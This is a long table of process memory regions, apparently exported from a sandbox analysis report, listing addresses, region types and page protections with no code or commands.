|
3519000
|
heap
|
page read and write
|
||
|
7AEE000
|
stack
|
page read and write
|
||
|
24DA6FE000
|
unkown
|
page readonly
|
||
|
3B0000
|
heap
|
page read and write
|
||
|
1170000
|
heap
|
page read and write
|
||
|
1AEBF000
|
stack
|
page read and write
|
||
|
7FF886B2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
E9C000
|
stack
|
page read and write
|
||
|
2990000
|
unkown
|
page readonly
|
||
|
350E000
|
heap
|
page read and write
|
||
|
521A000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D00000
|
trusted library allocation
|
page read and write
|
||
|
4F00000
|
heap
|
page read and write
|
||
|
43EE000
|
stack
|
page read and write
|
||
|
55FE000
|
stack
|
page read and write
|
||
|
7FF886FD0000
|
trusted library allocation
|
page read and write
|
||
|
1B61E000
|
stack
|
page read and write
|
||
|
4E40000
|
trusted library allocation
|
page read and write
|
||
|
52C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886EE0000
|
trusted library allocation
|
page read and write
|
||
|
33D000
|
unkown
|
page readonly
|
||
|
7FF886DB0000
|
trusted library allocation
|
page read and write
|
||
|
6E04000
|
trusted library allocation
|
page read and write
|
||
|
5EE0000
|
trusted library allocation
|
page read and write
|
||
|
1B1CD000
|
heap
|
page read and write
|
||
|
7FF886D40000
|
trusted library allocation
|
page read and write
|
||
|
52E4000
|
trusted library allocation
|
page read and write
|
||
|
40B0000
|
trusted library allocation
|
page read and write
|
||
|
7B8000
|
heap
|
page read and write
|
||
|
3E0E000
|
trusted library allocation
|
page read and write
|
||
|
13E0000
|
trusted library allocation
|
page read and write
|
||
|
2483000
|
trusted library allocation
|
page read and write
|
||
|
1505000
|
trusted library allocation
|
page execute and read and write
|
||
|
136E000
|
stack
|
page read and write
|
||
|
4E50000
|
trusted library allocation
|
page read and write
|
||
|
5270000
|
trusted library allocation
|
page read and write
|
||
|
1CDD000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B10000
|
trusted library allocation
|
page read and write
|
||
|
61F0000
|
heap
|
page read and write
|
||
|
1BCB0000
|
heap
|
page read and write
|
||
|
5A06000
|
trusted library allocation
|
page read and write
|
||
|
E7E000
|
stack
|
page read and write
|
||
|
2A04000
|
unkown
|
page readonly
|
||
|
7FF886C4F000
|
trusted library allocation
|
page execute and read and write
|
||
|
850000
|
heap
|
page read and write
|
||
|
9D4000
|
unkown
|
page write copy
|
||
|
8B92000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B3B000
|
trusted library allocation
|
page execute and read and write
|
||
|
F1B000
|
heap
|
page read and write
|
||
|
5E90000
|
heap
|
page read and write
|
||
|
7FF886EF0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D08000
|
trusted library allocation
|
page read and write
|
||
|
1B90B000
|
heap
|
page read and write
|
||
|
7FF886B1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886BC6000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E09000
|
trusted library allocation
|
page read and write
|
||
|
12C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DE0000
|
trusted library allocation
|
page read and write
|
||
|
6D0000
|
heap
|
page read and write
|
||
|
51D9000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B878000
|
stack
|
page read and write
|
||
|
575E000
|
stack
|
page read and write
|
||
|
7FF886B3B000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B1A7000
|
heap
|
page read and write
|
||
|
5BFD000
|
stack
|
page read and write
|
||
|
7FF886E50000
|
trusted library allocation
|
page read and write
|
||
|
8E72000
|
trusted library allocation
|
page read and write
|
||
|
1D426000
|
heap
|
page read and write
|
||
|
7FF886CBF000
|
trusted library allocation
|
page read and write
|
||
|
3525000
|
heap
|
page read and write
|
||
|
772000
|
heap
|
page read and write
|
||
|
344000
|
unkown
|
page read and write
|
||
|
5AFE000
|
stack
|
page read and write
|
||
|
346000
|
unkown
|
page readonly
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
330000
|
unkown
|
page readonly
|
||
|
1570000
|
trusted library section
|
page read and write
|
||
|
1B7B0000
|
unkown
|
page readonly
|
||
|
13E6000
|
trusted library allocation
|
page execute and read and write
|
||
|
5A90000
|
trusted library allocation
|
page read and write
|
||
|
7FF886F40000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886E0C000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D83000
|
trusted library allocation
|
page read and write
|
||
|
52E0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D44000
|
trusted library allocation
|
page read and write
|
||
|
741000
|
unkown
|
page readonly
|
||
|
73C000
|
heap
|
page read and write
|
||
|
D76000
|
heap
|
page read and write
|
||
|
7FF886B23000
|
trusted library allocation
|
page read and write
|
||
|
DDC000
|
heap
|
page read and write
|
||
|
730000
|
heap
|
page read and write
|
||
|
7FF886B2A000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D00000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D39000
|
trusted library allocation
|
page read and write
|
||
|
34B0000
|
heap
|
page read and write
|
||
|
5A70000
|
trusted library allocation
|
page read and write
|
||
|
D80000
|
heap
|
page read and write
|
||
|
7BE000
|
heap
|
page read and write
|
||
|
2994000
|
trusted library allocation
|
page read and write
|
||
|
25D2000
|
trusted library allocation
|
page read and write
|
||
|
7F6F000
|
stack
|
page read and write
|
||
|
5210000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E20000
|
trusted library allocation
|
page read and write
|
||
|
24C0000
|
heap
|
page read and write
|
||
|
7FF886D3E000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D3E000
|
trusted library allocation
|
page read and write
|
||
|
462F000
|
stack
|
page read and write
|
||
|
7FF886DB5000
|
trusted library allocation
|
page read and write
|
||
|
1B71E000
|
stack
|
page read and write
|
||
|
CF1000
|
stack
|
page read and write
|
||
|
331E000
|
stack
|
page read and write
|
||
|
34FE000
|
heap
|
page read and write
|
||
|
34FE000
|
heap
|
page read and write
|
||
|
52E6000
|
trusted library allocation
|
page read and write
|
||
|
7FAB000
|
stack
|
page read and write
|
||
|
52E0000
|
trusted library allocation
|
page read and write
|
||
|
24DA5FD000
|
stack
|
page read and write
|
||
|
7FF886DA9000
|
trusted library allocation
|
page read and write
|
||
|
7640000
|
trusted library allocation
|
page read and write
|
||
|
7640000
|
trusted library allocation
|
page read and write
|
||
|
1C4E000
|
trusted library allocation
|
page read and write
|
||
|
7FF886F20000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886CB8000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E80000
|
trusted library allocation
|
page read and write
|
||
|
880000
|
heap
|
page execute and read and write
|
||
|
2F1B000
|
stack
|
page read and write
|
||
|
51EB000
|
trusted library allocation
|
page read and write
|
||
|
52E0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E30000
|
trusted library allocation
|
page read and write
|
||
|
1B1C1000
|
heap
|
page read and write
|
||
|
5140000
|
heap
|
page read and write
|
||
|
1D410000
|
heap
|
page read and write
|
||
|
5C66000
|
trusted library section
|
page read and write
|
||
|
6305000
|
trusted library allocation
|
page read and write
|
||
|
3E80000
|
unkown
|
page readonly
|
||
|
13E2000
|
trusted library allocation
|
page read and write
|
||
|
7D30000
|
heap
|
page read and write
|
||
|
5870000
|
trusted library allocation
|
page execute and read and write
|
||
|
7640000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DD0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886BCC000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B1F000
|
stack
|
page read and write
|
||
|
13F0000
|
heap
|
page read and write
|
||
|
3525000
|
heap
|
page read and write
|
||
|
7FF886E70000
|
trusted library allocation
|
page read and write
|
||
|
F27000
|
heap
|
page read and write
|
||
|
7FF886C45000
|
trusted library allocation
|
page execute and read and write
|
||
|
770000
|
heap
|
page read and write
|
||
|
7FF886CD2000
|
trusted library allocation
|
page read and write
|
||
|
3FE7000
|
trusted library allocation
|
page read and write
|
||
|
1137000
|
trusted library allocation
|
page execute and read and write
|
||
|
3FA0000
|
trusted library allocation
|
page read and write
|
||
|
1AFBF000
|
stack
|
page read and write
|
||
|
13C0000
|
trusted library allocation
|
page read and write
|
||
|
5286000
|
trusted library allocation
|
page read and write
|
||
|
7FF886BC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B34000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E00000
|
trusted library allocation
|
page read and write
|
||
|
18E55E10000
|
heap
|
page read and write
|
||
|
7FF886EE0000
|
trusted library allocation
|
page read and write
|
||
|
3E50000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D70000
|
trusted library allocation
|
page read and write
|
||
|
1B23000
|
trusted library allocation
|
page read and write
|
||
|
132E000
|
stack
|
page read and write
|
||
|
1C3A000
|
trusted library allocation
|
page read and write
|
||
|
150B000
|
trusted library allocation
|
page execute and read and write
|
||
|
7F5C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886E60000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E00000
|
trusted library allocation
|
page read and write
|
||
|
5200000
|
trusted library allocation
|
page read and write
|
||
|
62FE000
|
stack
|
page read and write
|
||
|
7FF886E30000
|
trusted library allocation
|
page read and write
|
||
|
5040000
|
heap
|
page readonly
|
||
|
7FF886B30000
|
trusted library allocation
|
page read and write
|
||
|
1160000
|
trusted library allocation
|
page execute and read and write
|
||
|
24DAAFE000
|
unkown
|
page readonly
|
||
|
1BF8E000
|
stack
|
page read and write
|
||
|
7FF886D65000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B10000
|
trusted library allocation
|
page read and write
|
||
|
500C000
|
heap
|
page read and write
|
||
|
52B5000
|
trusted library allocation
|
page read and write
|
||
|
EEE000
|
heap
|
page read and write
|
||
|
7FF886CC5000
|
trusted library allocation
|
page read and write
|
||
|
15BE000
|
heap
|
page read and write
|
||
|
1507000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B0BE000
|
stack
|
page read and write
|
||
|
3517000
|
heap
|
page read and write
|
||
|
15A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886EA4000
|
trusted library allocation
|
page read and write
|
||
|
7FF886F40000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B49000
|
trusted library allocation
|
page read and write
|
||
|
5124000
|
trusted library allocation
|
page read and write
|
||
|
12B21000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E97000
|
trusted library allocation
|
page read and write
|
||
|
61BE000
|
stack
|
page read and write
|
||
|
883000
|
heap
|
page execute and read and write
|
||
|
18E56102000
|
heap
|
page read and write
|
||
|
5880000
|
heap
|
page read and write
|
||
|
1B976000
|
stack
|
page read and write
|
||
|
7FF886D71000
|
trusted library allocation
|
page read and write
|
||
|
5120000
|
trusted library allocation
|
page read and write
|
||
|
7FF886CB0000
|
trusted library allocation
|
page read and write
|
||
|
4770000
|
trusted library allocation
|
page read and write
|
||
|
50CE000
|
stack
|
page read and write
|
||
|
1B150000
|
heap
|
page read and write
|
||
|
1B9F2000
|
unkown
|
page readonly
|
||
|
2A61000
|
trusted library allocation
|
page read and write
|
||
|
3FC0000
|
trusted library allocation
|
page read and write
|
||
|
503E000
|
stack
|
page read and write
|
||
|
4E87000
|
trusted library allocation
|
page execute and read and write
|
||
|
351D000
|
heap
|
page read and write
|
||
|
1C405000
|
heap
|
page read and write
|
||
|
3E39000
|
trusted library allocation
|
page read and write
|
||
|
6CA3000
|
trusted library allocation
|
page read and write
|
||
|
5F3E000
|
stack
|
page read and write
|
||
|
4309000
|
trusted library allocation
|
page read and write
|
||
|
5840000
|
trusted library section
|
page read and write
|
||
|
7FF886E70000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D10000
|
trusted library allocation
|
page read and write
|
||
|
863000
|
trusted library allocation
|
page read and write
|
||
|
1580000
|
trusted library allocation
|
page read and write
|
||
|
3DC0000
|
unkown
|
page readonly
|
||
|
15E6000
|
heap
|
page read and write
|
||
|
7FF886B34000
|
trusted library allocation
|
page read and write
|
||
|
59BE000
|
stack
|
page read and write
|
||
|
8A0000
|
unkown
|
page readonly
|
||
|
165D000
|
heap
|
page read and write
|
||
|
4650000
|
trusted library allocation
|
page execute and read and write
|
||
|
4780000
|
trusted library allocation
|
page execute and read and write
|
||
|
52E0000
|
trusted library allocation
|
page read and write
|
||
|
8931000
|
trusted library allocation
|
page read and write
|
||
|
113B000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886D37000
|
trusted library allocation
|
page read and write
|
||
|
DCA000
|
heap
|
page read and write
|
||
|
40A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886F10000
|
trusted library allocation
|
page read and write
|
||
|
15B0000
|
heap
|
page read and write
|
||
|
3E3B000
|
trusted library allocation
|
page read and write
|
||
|
8923000
|
trusted library allocation
|
page read and write
|
||
|
1100000
|
trusted library allocation
|
page read and write
|
||
|
3F20000
|
trusted library allocation
|
page read and write
|
||
|
7FF886CF1000
|
trusted library allocation
|
page read and write
|
||
|
1126000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886CC7000
|
trusted library allocation
|
page read and write
|
||
|
1B510000
|
heap
|
page read and write
|
||
|
5450000
|
trusted library allocation
|
page read and write
|
||
|
7FF886EB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D55000
|
trusted library allocation
|
page read and write
|
||
|
6E15000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D60000
|
trusted library allocation
|
page read and write
|
||
|
52E0000
|
trusted library allocation
|
page read and write
|
||
|
B85000
|
heap
|
page read and write
|
||
|
344000
|
unkown
|
page write copy
|
||
|
5210000
|
trusted library allocation
|
page read and write
|
There are 725 hidden memdumps, click here to show them.